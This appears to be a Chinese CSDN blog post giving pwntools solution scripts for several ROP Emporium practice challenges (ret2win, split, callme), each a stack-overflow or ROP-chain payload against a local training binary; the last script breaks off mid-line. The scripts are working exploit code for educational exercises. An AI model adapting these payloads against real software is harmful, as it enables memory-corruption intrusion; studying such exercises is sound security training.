ropemporium新通关脚本

1)ret2win32from pwn import *catflag = 0x0804862Cp = process('./ret2win32')payload = 'A'*0x28 + p32(0) + p32(catflag) p.recvuntil('> ')p.send(payload)p.interactive()2)ret2winfrom pwn import *catflag = 0x0000000000400756p = process('./ret2win'
摘要由CSDN通过智能技术生成
1)ret2win32
from pwn import *
catflag = 0x0804862C
p = process('./ret2win32')
payload = 'A'*0x28 + p32(0) + p32(catflag) 
p.recvuntil('> ')
p.send(payload)
p.interactive()

2)ret2win
from pwn import *
catflag = 0x0000000000400756
p = process('./ret2win')
elf = ELF('./ret2win')
#gdb.attach(p, "b* 0x00000000004006E8")
payload = 'A'*0x20 + p64(0) + p64(catflag) 
p.recvuntil('> ')
p.send(payload)
p.interactive()

3) split32
from pwn import *
pltsystem = 0x080483E0 
usefulString = 0x0804A030
p = process('./split32')
payload = 'A'*0x28 + p32(0) + p32(pltsystem) + p32(0) + p32(usefulString)
p.recvuntil('> ')
p.send(payload)
p.interactive()

4) split
from pwn import *
pltsystem = 0x0000000000400560 
usefulString = 0x0000000000601060
poprdiret = 0x00000000004007c3
p = process('./split')
payload = 'A'*0x20 + p64(0) + p64(poprdiret) + p64(usefulString) + p64(pltsystem)
p.recvuntil('> ')
p.send(payload)
p.interactive()

5)callme32
from pwn import *
usefulString = 0x0804874F
param1 = 0xDEADBEEF
param2 = 0xCAFEBABE
param3 = 0xD00DF00D
plt_callme_one = 0x080484F0
plt_callme_two = 0x08048550
plt_callme_three = 0x080484E0
pop_esi_edi_ebp_ret = 0x080487f9
pop_ebx_esi_edi_ebp_ret = 0x080487f8
p = process('./callme32')
gdb.attach(p,"b *main")
#payload = 'A'*0x28 + p32(0) + p32(plt_callme_one) + p32(0) + p32(param1) + p32(param2) + p32(param3)  + p32(plt_callme_two) + p32(0) + p32(param1) + p32(param2) + p32(param3)+ p32(0) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3)
payload = 'A'*0x28 + p32(0) + p32(plt_callme_one) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3) + p32(plt_callme_two) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3)+ p32(plt_callme_three) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3)
p.recvuntil('> ')
p.send(payload)
p.interactive()

6)callme
from pwn import *
usefulString = 0x0804874F
param1 = 0xDEADBEEFDEADBEEF
param2 = 0xCAFEBABECAFEBABE
param3 = 0xD00DF00DD00DF00D
plt_callme_one = 0x0000000000400720 
plt_callme_two = 0x0000000000400740
plt_callme_three = 0x00000000004006F0
pop_rdi_rsi_pop_ret = 0x000000000040093c
p = process('./callme')
#gdb.attach(p,"b *main")
payload = 'A'*0x20 + p64(0) + p64(pop_rdi_rsi_pop_ret) + p64(param1) + p64(param2) + p64(param3) + p64(plt_callme_one) + p64(pop_rdi_rsi_pop_ret) + p64(param1) + p64(param2) + p64(param3) + p64(plt_callme_two) + p64(pop_rdi_rsi_pop_ret) + p64(param1) + p64
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值